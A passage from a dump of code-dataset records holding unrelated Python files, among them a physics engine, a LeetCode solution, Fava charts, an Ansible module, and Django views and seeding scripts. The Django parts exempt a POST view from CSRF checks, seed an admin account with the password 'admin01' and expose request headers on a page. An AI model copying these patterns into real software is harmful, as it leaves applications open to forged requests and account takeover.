I want to use a track-bar to change a form's opacity.\n\nThis is my code:\n\ndecimal trans = trackBar1.Value / 5000;\nthis.Opacity = trans;\n\nWhen I try to build it, I get this error:\n\nGiven a specific DateTime value, how do I display relative time, like:\n\n• 2 hours ago\n• 3 days ago\n• a month ago\n\n
Et cetera?\"\n\"\"\"\n    document = ''.join(e for e in document if e.isalnum() or e == ' ')\n    new_doc_bow = dictionary.doc2bow(document.lower().split())\n    #print(tfidf[new_doc_bow])\n\n    new_corpus_tfidf = [tfidf[new_doc_bow]]\n    lsi.add_documents(new_corpus_tfidf)\n    new_corpus_lsi = lsi[new_corpus_tfidf]\n\n    doc_count = 0\n    topic_count = 0\n    for new_doc in new_corpus_lsi:\n        doc_count += 1\n        print(new_doc)\n        for topic_id, correlation in new_doc:\n            if correlation > 0.05:\n                print(lsi.print_topic(topic_id))\n                topic_count += 1\n    print(\"All docs: {} and related topics: {}\".format(doc_count, topic_count))\n\n\nif __name__ == \"__main__\":\n    main()","sub_path":"module1.py","file_name":"module1.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"3995191","text":"import math\nfrom enum import Enum\nfrom my_math import Vector2, moment_of_inertia\n\n\nclass AaBb:\n\n    def __init__(self, x1, y1, x2, y2):\n        self._x1 = x1\n        self._y1 = y1\n        self._x2 = x2\n        self._y2 = y2\n\n    def __add__(self, other):\n        if isinstance(other, AaBb):\n            # Union of two boxes: min of the lower corner, max of the upper\n            x1 = min(other.get_x1, self.get_x1)\n            y1 = min(other.get_y1, self.get_y1)\n            x2 = max(other.get_x2, self.get_x2)\n            y2 = max(other.get_y2, self.get_y2)\n            return AaBb(x1, y1, x2, y2)\n        return None\n\n    def __iadd__(self, other):\n        if isinstance(other, AaBb):\n            x1 = min(other.get_x1, self.get_x1)\n            y1 = min(other.get_y1, self.get_y1)\n            x2 = max(other.get_x2, self.get_x2)\n            y2 = max(other.get_y2, self.get_y2)\n            self.set(x1, y1, x2, y2)\n            return self\n        return None\n\n    def __str__(self):\n        return \"x1:\" + str(self.get_x1) + \"; y1:\" + str(self.get_y1) + \"; x2:\" + str(self.get_x2) + \"; y2:\" + str(\n            self.get_y2) + ';'\n\n    def set(self, x1, y1, x2=None, y2=None):\n        if isinstance(x1, AaBb) and isinstance(x2, AaBb):\n            # Union of the two boxes passed as (box1, box2)\n            self._x1 = min(x1.get_x1, x2.get_x1)\n            self._y1 = min(x1.get_y1, x2.get_y1)\n            self._x2 = max(x1.get_x2, x2.get_x2)\n            self._y2 = max(x1.get_y2, x2.get_y2)\n        else:\n            self._x1 = min(x1, x2)\n            self._y1 = min(y1, y2)\n            self._x2 = max(x1, x2)\n            self._y2 = max(y1, y2)\n\n    def intersection_AaBb(self, x1, y1=None, x2=None, y2=None):\n        if isinstance(x1, AaBb):\n            if self.get_x1 > x1.get_x2 or self.get_x2 < x1.get_x1:\n                return False\n            elif self.get_y1 > x1.get_y2 or self.get_y2 < x1.get_y1:\n                return False\n            else:\n                return True\n        else:\n            if self.get_x1 > x2 or self.get_x2 < x1:\n                return False\n            elif self.get_y1 > y2 or self.get_y2 < y1:\n                return False\n            else:\n                return True\n\n    @property\n    def get_x1(self):\n        return self._x1\n\n    @property\n    def get_y1(self):\n        return self._y1\n\n    @property\n    def get_x2(self):\n        return self._x2\n\n    @property\n    def get_y2(self):\n        return self._y2\n\n\nclass Shape:\n\n    def __init__(self, vertices: list):\n        self._static_vertices = tuple(vertices)\n        self._vertices = vertices\n        self._normals = self._create_normals()\n        self._center = self._get_center()\n        self._aaBb = AaBb(0, 0, 0, 0)\n\n    def _get_center(self) -> Vector2:\n        v = Vector2(0, 0)\n        for num in range(len(self._static_vertices) // 2):\n            v.x += self._vertices[2 * num]\n            v.y += self._vertices[2 * num + 1]\n        v *= 2 / len(self._vertices)\n        return v\n\n    def _create_normals(self):\n        v = self._vertices\n        nor = []\n        for n in range(len(v) // 2 - 1):\n            q = Vector2(v[2 * n] - v[2 * n + 2], v[2 * n + 1] - v[2 * n + 3]).rotate90(1).nor()\n            nor.append(q)\n        return nor\n\n    def _update_aaBb(self):\n        v = self._vertices\n        x1, y1 = v[0], v[1]\n        x2, y2 = x1, y1\n        # Track the min/max of each coordinate to form the bounding box\n        for i in range(len(v) // 2):\n            if x1 > v[2 * i]:\n                x1 = v[2 * i]\n            
if y1 > v[2 * i + 1]:\n                y1 = v[2 * i + 1]\n            if x2 < v[2 * i]:\n                x2 = v[2 * i]\n            if y2 < v[2 * i + 1]:\n                y2 = v[2 * i + 1]\n        self._aaBb.set(x1, y1, x2, y2)\n\n    def _update_normals(self):\n        v = self._vertices\n        nor = self.normals\n        for n in range(len(v) // 2 - 1):\n            nor[n].set(v[2 * n] - v[2 * n + 2], v[2 * n + 1] - v[2 * n + 3]).rotate90(1).nor()\n\n    def update(self, angle, position):\n        s_v = self._static_vertices\n        v = self._vertices\n\n        cos = 1\n        sin = 0\n        if angle != 0:\n            cos = math.cos(angle)\n            sin = math.sin(angle)\n\n        # Rotate the static vertices, then translate them to the body position\n        for num in range(len(v) // 2 - 1):\n            x = s_v[2 * num]\n            y = s_v[2 * num + 1]\n            old_x = x\n            x = x * cos - y * sin\n            y = old_x * sin + y * cos\n            v[2 * num] = x + position.x\n            v[2 * num + 1] = y + position.y\n        v[-1] = v[1]\n        v[-2] = v[0]\n        self._update_aaBb()\n        self._update_normals()\n\n    @property\n    def get_aaBb(self) -> AaBb:\n        return self._aaBb\n\n    @property\n    def vertices(self):\n        return self._vertices\n\n    @property\n    def normals(self):\n        return self._normals\n\n    @property\n    def center(self):\n        return self._center\n\n    @vertices.setter\n    def vertices(self, v):\n        self._vertices = v\n        self._static_vertices = tuple(v)\n\n\nclass Body_Type(Enum):\n    Static = 0\n    Dynamic = 1\n\n\nclass Body_Def:\n\n    def __init__(self, pos: Vector2, t: Body_Type):\n        self.type = t\n        self.mass = 10.0\n        self.i = 0\n        self.pos = pos\n        self.velocity = Vector2(0, 0)\n\n        self.angle = 0.0\n        self.angular_velocity = 0.0\n        self.elasticity = 1.0\n        self.friction = 0.0\n\n    def set_mass(self, mass: float):\n        self.mass = mass\n        return self\n\n    def set_elasticity(self, elasticity: float):\n        self.elasticity = elasticity\n        return self\n\n    def set_friction(self, friction: float):\n        self.friction = friction\n        return self\n\n    def set_velocity(self, v, v_y=None):\n        if v_y is None:\n            self.velocity.set(v.x, v.y)\n        else:\n            self.velocity.set(v, v_y)\n        return self\n\n    def set_angular_velocity(self, a_v):\n        self.angular_velocity = a_v\n        return self\n\n\nclass Body:\n\n    def __init__(self, shape: Shape, body_def: Body_Def):\n        self.body_def = body_def\n        self._shape = shape\n\n        self._force = Vector2(0, 0)\n        self._moment_force = 0\n\n        self._user_data = None\n\n        self.body_def.i = moment_of_inertia(self._shape.vertices, body_def.mass, self.position)\n        self._inv_i = 1 / self.body_def.i\n        self._inv_m = 1 / body_def.mass\n\n    def step(self, delta):\n        if self.type == Body_Type.Static:\n            pass\n        elif self.type == Body_Type.Dynamic:\n            # Integrate force -> velocity -> position over the timestep\n            self.body_def.velocity.x += self._force.x * self._inv_m * delta\n            self.body_def.velocity.y += self._force.y * self._inv_m * delta\n            self.body_def.angle += self.body_def.angular_velocity * delta\n            self.body_def.pos.add(self.body_def.velocity.x * delta, self.body_def.velocity.y * delta)\n            self._shape.update(self.angle, self.position)\n            self._force.set(0, 0)\n\n    def add_force(self, force, force_y=None):\n        if force_y is None:\n            self._force += force\n        else:\n            self._force.x += force\n            self._force.y += force_y\n\n    def add_position(self, x, y=None):\n        if isinstance(x, Vector2):\n            self.body_def.pos.x += x.x\n            self.body_def.pos.y += x.y\n        else:\n            self.body_def.pos.x += x\n            self.body_def.pos.y += y\n\n    @property\n    def position(self) -> Vector2:\n        return self.body_def.pos\n\n    @position.setter\n    def position(self, pos):\n        self.body_def.pos.set(pos.x, pos.y)\n\n    @property\n    def velocity(self) -> Vector2:\n        return self.body_def.velocity\n\n    @velocity.setter\n    def velocity(self, v):\n        if self.type != Body_Type.Static:\n            self.body_def.velocity.set(v.x, v.y)\n\n    @property\n    def angular_velocity(self) -> float:\n        return 
self.body_def.angular_velocity\n\n    @angular_velocity.setter\n    def angular_velocity(self, w: float):\n        if self.type != Body_Type.Static:\n            self.body_def.angular_velocity = w\n\n    @property\n    def vertices(self) -> list:\n        return self._shape.vertices\n\n    @vertices.setter\n    def vertices(self, v: list):\n        self._shape.vertices = v\n\n    @property\n    def angle(self) -> float:\n        return self.body_def.angle\n\n    @angle.setter\n    def angle(self, angle: float):\n        self.body_def.angle = angle\n\n    @property\n    def user_data(self):\n        return self._user_data\n\n    @user_data.setter\n    def user_data(self, d):\n        self._user_data = d\n\n    @property\n    def shape(self) -> Shape:\n        return self._shape\n\n    @property\n    def elasticity(self):\n        return self.body_def.elasticity\n\n    @property\n    def get_aaBb(self) -> AaBb:\n        return self.shape.get_aaBb\n\n    @property\n    def type(self) -> Body_Type:\n        return self.body_def.type\n\n    @property\n    def mass(self) -> float:\n        return self.body_def.mass\n\n    @property\n    def i(self):\n        return self.body_def.i\n","sub_path":"body.py","file_name":"body.py","file_ext":"py","file_size_in_byte":8722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"351611608","text":"#\r\n# @lc app=leetcode.cn id=1373 lang=python3\r\n#\r\n# [1373] Maximum Sum BST in Binary Tree\r\n#\r\n# https://leetcode-cn.com/problems/maximum-sum-bst-in-binary-tree/description/\r\n#\r\n# algorithms\r\n# Hard (39.58%)\r\n# Likes: 55\r\n# Dislikes: 0\r\n# Total Accepted: 6.5K\r\n# Total Submissions: 16.4K\r\n# Testcase Example: '[1,4,3,2,4,2,5,null,null,null,null,null,null,4,6]'\r\n#\r\n# Given a binary tree rooted at root, return the maximum sum of keys of any\r\n# subtree that is also a binary search tree (BST).\r\n#\r\n# A binary search tree is defined as follows:\r\n#\r\n# The keys in any node's left subtree are all smaller than that node's key.\r\n# The keys in any node's right subtree are all greater than that node's key.\r\n# Any node's left and right subtrees are themselves binary search trees.\r\n#\r\n# Example 1:\r\n#\r\n# Input: root = [1,4,3,2,4,2,5,null,null,null,null,null,null,4,6]\r\n# Output: 20\r\n# Explanation: the subtree rooted at the node with key 3 is the BST with the\r\n# largest sum.\r\n#\r\n# Example 2:\r\n#\r\n# Input: root = [4,3,null,1,2]\r\n# Output: 2\r\n# Explanation: the single-node subtree with key 2 is the BST with the largest\r\n# sum.\r\n#\r\n# Example 3:\r\n#\r\n# Input: root = [-4,-2,-5]\r\n# Output: 0\r\n# Explanation: all keys are negative, so the BST with the largest sum is\r\n# empty.\r\n#\r\n# Example 4:\r\n#\r\n# Input: root = [2,1,3]\r\n# Output: 6\r\n#\r\n# Example 5:\r\n#\r\n# Input: root = [5,4,8,3,null,6,3]\r\n# Output: 7\r\n#\r\n# Constraints:\r\n#\r\n# Each tree has 1 to 40000 nodes.\r\n# Each node's key is in the range [-4 * 10^4, 4 * 10^4].\r\n#\r\n\r\n# @lc code=start\r\n# Definition for a binary tree node.\r\n# class TreeNode:\r\n#     def __init__(self, val=0, left=None, right=None):\r\n#         self.val = val\r\n#         self.left = left\r\n#         self.right = right\r\nclass Solution:\r\n    def maxSumBST(self, root: TreeNode) -> int:\r\n        self.maxSum = float('-inf')\r\n        def traverse(root):\r\n            if root is None:\r\n                # Return an array of length 4:\r\n                # res[0] - whether the tree rooted at root is a BST\r\n                # res[1] - the minimum value in the tree rooted at root\r\n                # res[2] - the maximum value in the tree rooted at root\r\n                # res[3] - the sum of all node values in the tree rooted at root\r\n                return [1, float('inf'), float('-inf'), 0]\r\n\r\n            left = traverse(root.left)\r\n            right = traverse(root.right)\r\n\r\n            res = [0] * 4\r\n            # Check whether the tree rooted at the current node is a BST\r\n            if left[0] == 1 and right[0] == 1 and root.val > left[2] and root.val < right[1]:\r\n                res[0] = 1\r\n                res[1] = min(left[1], root.val)\r\n                res[2] = max(right[2], root.val)\r\n                res[3] = left[3] + right[3] + root.val\r\n                self.maxSum = max(self.maxSum, res[3])\r\n            else:\r\n                res[0] = 0\r\n            return res\r\n\r\n        traverse(root)\r\n        # An empty subtree counts as a BST with sum 0 (see example 3)\r\n        return max(self.maxSum, 0)\r\n\r\n\r\n# @lc 
code=end\r\n\r\n","sub_path":"leetcode/1373.二叉搜索子树的最大键值和.py","file_name":"1373.二叉搜索子树的最大键值和.py","file_ext":"py","file_size_in_byte":3022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"399828026","text":"\"\"\"Provide data suitable for Fava's charts. \"\"\"\nfrom datetime import date, datetime\n\nfrom beancount.core.amount import Amount\nfrom beancount.core.number import Decimal\nfrom beancount.core.position import Position\nfrom beancount.core.inventory import Inventory\nfrom beancount.core import realization\nfrom beancount.core.data import iter_entry_dates\nfrom flask.json import JSONEncoder\n\nfrom fava.core.helpers import FavaModule\nfrom fava.core.holdings import net_worth_at_dates\n\n\nclass FavaJSONEncoder(JSONEncoder):\n\n def default(self, o): # pylint: disable=E0202\n if isinstance(o, datetime):\n return o.strftime('%Y-%m-%dT%H:%M:%SZ')\n elif isinstance(o, date):\n return o.strftime('%Y-%m-%d')\n elif isinstance(o, Decimal):\n return float(o)\n elif isinstance(o, Amount):\n return str(o)\n elif isinstance(o, Position):\n return str(o)\n elif isinstance(o, (set, frozenset)):\n return list(o)\n try:\n return JSONEncoder.default(self, o)\n except TypeError:\n # workaround for #472\n try:\n return str(o)\n except TypeError:\n return ''\n\n\ndef _serialize_inventory(inventory, at_cost=False):\n \"\"\"Renders an Inventory to a currency -> amount dict.\"\"\"\n if at_cost:\n inventory = inventory.cost()\n else:\n inventory = inventory.units()\n return {p.units.currency: p.units.number for p in inventory}\n\n\ndef _real_account(account_name, entries, begin_date, end_date):\n if begin_date:\n entries = list(iter_entry_dates(entries, begin_date, end_date))\n\n return realization.get_or_create(realization.realize(entries),\n account_name)\n\n\ndef _serialize_real_account(real_account):\n return {\n 'account': real_account.account,\n 'balance_children':\n _serialize_inventory(realization.compute_balance(real_account),\n at_cost=True),\n 'balance': _serialize_inventory(real_account.balance, at_cost=True),\n 'children': [_serialize_real_account(a)\n for n, a in sorted(real_account.items())],\n }\n\n\nclass ChartModule(FavaModule):\n __slots__ = ['ledger']\n\n def _total_balance(self, names, begin_date, end_date):\n totals = [realization.compute_balance(\n _real_account(account_name, self.ledger.entries, begin_date,\n end_date))\n for account_name in names]\n return _serialize_inventory(sum(totals, Inventory()),\n at_cost=True)\n\n def events(self, event_type):\n return [{\n 'type': entry.type,\n 'date': entry.date,\n 'description': entry.description\n } for entry in self.ledger.events(event_type)]\n\n def hierarchy(self, account_name, begin_date=None, end_date=None):\n real_account = _real_account(\n account_name, self.ledger.entries, begin_date, end_date)\n return _serialize_real_account(real_account)\n\n def interval_totals(self, interval, account_name):\n \"\"\"Renders totals for account (or accounts) in the intervals.\"\"\"\n if isinstance(account_name, str):\n names = [account_name]\n else:\n names = account_name\n\n interval_tuples = self.ledger._interval_tuples(interval)\n return [{\n 'begin_date': begin_date,\n 'totals': self._total_balance(\n names,\n begin_date, end_date),\n 'budgets': self.ledger.budgets.calculate(names[0], begin_date,\n end_date),\n } for begin_date, end_date in interval_tuples]\n\n def linechart(self, account_name):\n real_account = realization.get_or_create(self.ledger.root_account,\n account_name)\n 
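# Each item yielded by realization.iterate_with_balance() is an\n        # (entry, postings, change, balance) tuple: 'change' holds the entry's\n        # delta inventory and 'balance' the running total. One serialized\n        # point below therefore looks roughly like this (a sketch, assuming a\n        # ledger holding USD and EUR):\n        #     {'date': date(2016, 1, 1), 'balance': {'EUR': 0, 'USD': 1200.0}}\n        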
postings = realization.get_postings(real_account)\n        journal = realization.iterate_with_balance(postings)\n\n        return [{\n            'date': entry.date,\n            # when there's no holding for a commodity, it will be missing from\n            # 'balance' field but appear in 'change' field. Use 0 for those\n            # commodities.\n            'balance': dict({curr: 0 for curr in list(change.currencies())},\n                            **_serialize_inventory(balance)),\n        } for entry, _, change, balance in journal if len(change)]\n\n    def net_worth_at_dates(self, interval):\n        interval_tuples = self.ledger._interval_tuples(interval)\n        if not interval_tuples:\n            return []\n\n        dates = [interval_tuples[0][0]] + [p[1] for p in interval_tuples]\n\n        return net_worth_at_dates(self.ledger.entries, dates,\n                                  self.ledger.price_map,\n                                  self.ledger.options)\n","sub_path":"fava/core/charts.py","file_name":"charts.py","file_ext":"py","file_size_in_byte":4927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"167227555","text":"from rest_framework.generics import CreateAPIView\nfrom .serializers import CalculateSerializer\nfrom .models import Calculate\n\n\nclass CalculateCreateView(CreateAPIView):\n    queryset = Calculate.objects.all()\n    serializer_class = CalculateSerializer\n\n    def post(self, request, *args, **kwargs):\n        r = super(CalculateCreateView, self).create(request)\n        # call the calculation function\n        self.calculate_qrisk()\n        return r\n\n    def calculate_qrisk(self):\n        from libs import qrisk_male, qrisk_female\n\n        data = self.request.data\n\n        cholesterol = 0.0 if data.get('cholesterol') == '' else data.get('cholesterol')\n        sytolic = 0.0 if data.get('sytolic') == '' else data.get('sytolic')\n        town = 0.0\n        b_AF = 0.0 if data.get('atrial_fibrillation') is None else data.get('atrial_fibrillation')\n        b_ra = 0.0 if data.get('rheumatoid') is None else data.get('rheumatoid')\n        b_renal = 0.0 if data.get('kidney') is None else data.get('kidney')\n        b_treatedhyp = 0.0 if data.get('on_blood_pressure_treatment') is None else data.get('on_blood_pressure_treatment')\n        angina = 0.0 if data.get('angina') is None else data.get('angina')\n\n        if data.get('sex') == 'M':\n            result = qrisk_male.cvd_male_raw(\n                int(data.get('age')), b_AF,\n                b_ra, b_renal,\n                b_treatedhyp, 0.0, 0.0, 1.0,\n                int(data.get('ethny')), angina, cholesterol,\n                sytolic, int(data.get('smoke')), 0.0, town)\n            print(result)\n        else:\n            result = qrisk_female()\n\n        return result\n","sub_path":"calculate/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"26995361","text":"#!/usr/bin/python\n\nimport os\nimport logging\nimport requests\nimport copy\nimport ast\nfrom ansible.module_utils.basic import AnsibleModule\nfrom ansible.module_utils.pask_prestapi import PrestApi,\\\n    OP_DELETE, OP_GET, OP_POST, OP_PUT\nfrom ansible.module_utils.pask_module import PaskModule, try_except\n\n\ninner_ip_args = dict(\n    address=dict(type='str', required=True),\n    broadcast=dict(type='str'),\n    overlapped=dict(type='str')\n)\n\ninner_ip6_args = dict(\n    address=dict(type='str', required=True),\n    broadcast=dict(type='str'),\n)\n\ninner_ip6_args['adv-on-link'] = dict(type='str')\ninner_ip6_args['adv-autonomous'] = dict(type='str')\ninner_ip6_args['adv-router-addr'] = dict(type='str')\ninner_ip6_args['adv-valid-lifetime'] = dict(type='str')\ninner_ip6_args['adv-preferred-lifetime'] = dict(type='str')\n\nmodule_args = dict(\n    name=dict(type='str', required=True),\n    ip=dict(type='dict', 
options=inner_ip_args),\n    ip6=dict(type='dict', options=inner_ip6_args),\n    mtu=dict(type='str'),\n    rpf=dict(type='str'),\n    status=dict(type='str'),\n)\n\nmodule_args['adv-cur-hop-limit'] = dict(type='str')\nmodule_args['adv-default-lifetime'] = dict(type='str')\nmodule_args['adv-reachable-time'] = dict(type='str')\nmodule_args['adv-retrans-timer'] = dict(type='str')\nmodule_args['adv-send-advert'] = dict(type='str')\nmodule_args['max-rtr-adv-interval'] = dict(type='str')\nmodule_args['min-rtr-adv-interval'] = dict(type='str')\n\nname = 'interface'\n\n\nclass PaskInterface(PaskModule):\n    def __init__(self, name, module_args):\n        super(PaskInterface, self).__init__(name, module_args)\n\n    @try_except\n    def run(self):\n        data = self.make_data(self.module.params, include_inner=True)\n        url = os.path.join(self.url, self.module.params['name'])\n        self.resp = self.put(url, data)\n\n\ndef main():\n    interface = PaskInterface(name, module_args)\n    interface.set_param()\n    interface.run()\n    interface.set_result()\n\nif __name__ == '__main__':\n    main()\n","sub_path":"library/pask_interface.py","file_name":"pask_interface.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"191797940","text":"import networkx as nx\nimport utility\n\nmseed = utility.mGraph()\nmseed.load_from_file('eval.mgraph')\n\nm = utility.mGraph()\nm.load_from_file('../max_degree_3.mgraph')\n\ndd = nx.degree_histogram(mseed.g) ## for graph degree\ndd = [i / sum(dd) for i in dd]\ndd_bin = mseed.get_dd_bin()\ndd_bin = [i / sum(dd_bin) for i in dd_bin]\ndd2_bin = mseed.get_dd2_bin()\n\n#print(dd)\nprint(dd_bin)\nprint(dd2_bin)\n\ndd = nx.degree_histogram(m.g) ## for graph degree\ndd = [i / sum(dd) for i in dd]\ndd_bin = m.get_dd_bin()\ndd_bin = [i / sum(dd_bin) for i in dd_bin]\ndd2_bin = m.get_dd2_bin()\n\n#print(dd)\nprint(dd_bin)\nprint(dd2_bin)\n","sub_path":"marsQuery/cal_degree.py","file_name":"cal_degree.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"293273551","text":"# -*- coding: utf-8 -*-\n\nimport pandas as pd\n#import cProfile\nimport time\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sns\nstart = time.time()\n\n\ndef excel_mode():\n    start = time.time()\n    for i in range(3):\n        df0 = pd.read_csv('ex.csv')\n        print(i)\n    
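# A rough wall-clock benchmark: the three repeated reads above are timed\n    # as one batch and the total duration is printed below\n    # (time.perf_counter() would be a finer-grained timer, but time.time()\n    # matches the rest of this script).\n    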
end = time.time()\n    print('excel_mode duration:',str(end-start))\n#print(df0.describe())\n\ndef txt_mode():\n    start = time.time()\n    for i in range(3):\n        df1 = pd.read_table('ex.txt',sep='\\t',encoding='gb2312')\n        print(i)\n    end = time.time()\n    print('txt_mode duration:',str(end-start))\n\nexcel_mode()\ntxt_mode()\n\n#df0 = pd.read_excel('ex.xlsx')\n#df0 = pd.read_table('ex.txt',sep='\\t',encoding='gb2312')\n#fig = plt.figure()\n##ax = fig.add_subplot(111)\n#df0.boxplot(column= 'ADC',by='SBR')\n##sns.boxplot(x='SBR',y='ADC',data=df0)\n#print(df0.groupby('SBR')['ADC'].agg([np.mean,np.std,'count']))\n#end = time.time()\n#print('test time:',str(end-start))","sub_path":"2-work/Python/python-Intv/company_plot/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"42364336","text":"# -*- coding: utf-8 -*-\n\"\"\" Module that inits data in the DB \"\"\"\nimport logging\nfrom arttest.services import (ArticlesService, AccountService,ArticleTypesService, SubscribersService)\nfrom arttest.models.models import (Article, Account, ArticleType, Subscriber)\nfrom arttest.logic.helpers import dt_to_text\n\nLOG = logging.getLogger(__name__)\n\nclass InitDB(object):\n    \"\"\" Seeds the database with default records \"\"\"\n    def __init__(self):\n        self.articles = ArticlesService()\n        self.accounts = AccountService()\n        self.types = ArticleTypesService()\n        self.subscribers = SubscribersService()\n        self.dgroups = {}\n\n    def add(self):\n        \"\"\" Inits DB \"\"\"\n        LOG.info(\"Initializing db data\")\n        try:\n            if self.types.count() == 0:\n                self.init_article_types()\n            if self.accounts.count() == 0:\n                self.init_admin()\n            LOG.info(\"Successfully finished\")\n        except Exception as ex:\n            LOG.error(\"An error occurred while initializing db data\")\n            LOG.exception(ex)\n\n    def init_admin(self):\n        \"\"\" Inits first admin user \"\"\"\n        account = Account()\n        account.login = \"admin\"\n        account.password = \"admin01\"\n        account.name = \"Admin\"\n        account.lastname = \"Admin\"\n        account.permissions = \"Admin\"\n        self.accounts.add(account)\n\n    def init_article_types(self):\n        \"\"\"Adds article types to DB \"\"\"\n        # Init first\n        article_type = ArticleType()\n        article_type.code = 'grey'\n        article_type.name = 'Szary'\n        article_type.color = '#242424'\n        # Init second\n        article_type2 = ArticleType()\n        article_type2.code = 'red'\n        article_type2.name = 'Czerwony'\n        article_type2.color = '#bddbbb'\n        # Init third\n        article_type3 = ArticleType()\n        article_type3.code = 'green'\n        article_type3.name = 'Zielony'\n        article_type3.color = '#18c118'\n        self.types.add(article_type)\n        self.types.add(article_type2)\n        self.types.add(article_type3)\n\n    def init_subscriber(self):\n        \"\"\" Inits a subscriber \"\"\"\n        sub = Subscriber()\n        sub.name = \"aaaa\"\n        sub.lastname = \"dsadsad\"\n        sub.email = \"SSS@sds\"\n        sub = self.subscribers.add(sub)\n        LOG.debug(str(sub.id))\n","sub_path":"arttest/scripts/initdb.py","file_name":"initdb.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"83010535","text":"\"\"\"Turtle rainbow drawing\"\"\"\nimport turtle as t\n\n\ndef init(x, y, z, speed):\n    t.setup(x, y)\n    t.pensize(z)\n    t.speed(speed)\n\n\ndef start(start, end):\n    t.penup()\n    t.setx(start)\n    t.sety(end)\n    t.pendown()\n\n\ndef draw(color, position, radius, extend):\n    t.pendown()\n    t.left(position)\n    t.color(color)\n    t.circle(radius, extend)\n    t.penup()\n\n\ninit(800, 800, 20, 
10)\n\nstart(100, 0)\ndraw('red', 90, 100, 180)\nstart(120, 0)\ndraw('orange', 180, 120, 180)\nstart(140, 0)\ndraw('yellow', 180, 140, 180)\nstart(160, 0)\ndraw('green', 180, 160, 180)\nstart(180, 0)\ndraw('cyan', 180, 180, 180)\nstart(200, 0)\ndraw('blue', 180, 200, 180)\nstart(220, 0)\ndraw('purple', 180, 220, 180)\nt.done()\n","sub_path":"L2/2_Rainbow.py","file_name":"2_Rainbow.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"126306128","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.utils.encoding import python_2_unicode_compatible\nfrom django.shortcuts import render\nfrom models import Question, Choice, Build\nfrom django.http import JsonResponse,HttpResponseRedirect,Http404,HttpResponse\n\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import auth\nfrom django.core import serializers\nimport json\n\nlogin_url='/login/'\n\n@login_required(login_url=login_url)\ndef get_data_quest(request):\n    data = Build.objects.all()[:170]\n    requestData=[]\n    for i in request.META:\n        requestData.append([i,request.META[i]])\n    return render(request,r'grid/GridJQuery/index.htm',{'data': data,\n                                                         'requestData':requestData})\n\n\n@login_required(login_url=login_url)\ndef sb_admin(request):\n    data = Build.objects.all()[:170]\n    return render(request,r'grid/Bootstrap/index.html')\n\n@login_required(login_url=login_url)\ndef sb_tables(request):\n    return render(request,r'grid/Bootstrap/tables.html')\n\n@login_required(login_url=login_url)\ndef map(request):\n    return render(request,r'v1/map-element.html',{'Dashboard':'',\n                  'info':'Map of internet provider coverage','map':True})\n\n@login_required(login_url=login_url)\ndef build_detal_information(request):\n    id=int(request.GET['id'])\n    data = Build.objects.get(id=id)\n    adress=str(data)\n    balans=str(data.balans)\n    service=str(data.service)\n\n    return JsonResponse({'adress':adress,'balans':balans,'service':service})\n\n\n@login_required(login_url=login_url)\n@csrf_exempt  # this decorator disables the CSRF token check!\ndef send_claim(request):\n    id=int(request.POST['id'])\n    data = Build.objects.get(id=id)\n    adress=str(data)\n    balans=str(data.balans)\n    service=str(data.service)\n    return JsonResponse({'adress':adress,'balans':balans,'service':service})\n\n@login_required(login_url=login_url)\ndef test_build(request):\n    data = Build.objects.all()[1:2].values_list()\n    requestData=[]\n    for i in data:\n        requestData.append(i)\n    return render(request,r'map/Object_detal_information.html',{'requestData':requestData})\n\n\ndef login(request):\n    return render(request,r'v1/login-form.html')\n\n@login_required(login_url=login_url)\ndef base(request):\n    return render(request,r'v1/base.html')\n\ndef tables(request):\n    return render(request,r'v1/table.html')\n\n\n##@csrf_exempt  # this decorator disables the CSRF token check!\ndef login_validate(request):\n    html = \"Nothing worked \"\n    if request.method == 'POST':\n        username = request.POST.get('username', '')\n        password = request.POST.get('password', '')\n        user = auth.authenticate(username=username, password=password)\n        if user is not None and user.is_active:\n            # The password is correct and the user is active\n            auth.login(request, user)\n            # Redirect to the successful-login page.\n            return HttpResponseRedirect('../')\n        else:\n            # Redirect to the error page\n            return HttpResponse(html)\n    
else:\n        # Redirect to the error page\n        return HttpResponse(html)\n\ndef logout(request):\n    auth.logout(request)\n    # Redirect to the successful-logout page.\n    return HttpResponseRedirect(\"/login/\")\n\n@login_required(login_url=login_url)\ndef get_build_table_data(request):\n    data = Build.objects.all()[:1000]\n    jasonDatalist=[]\n    for i in data:\n        jasonDatalist.append([str(i),str(i.balans),str(i.service)])\n    r=json.dumps(jasonDatalist)\n    return HttpResponse(r, content_type=\"application/json\")\n\n\n","sub_path":"drtm/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
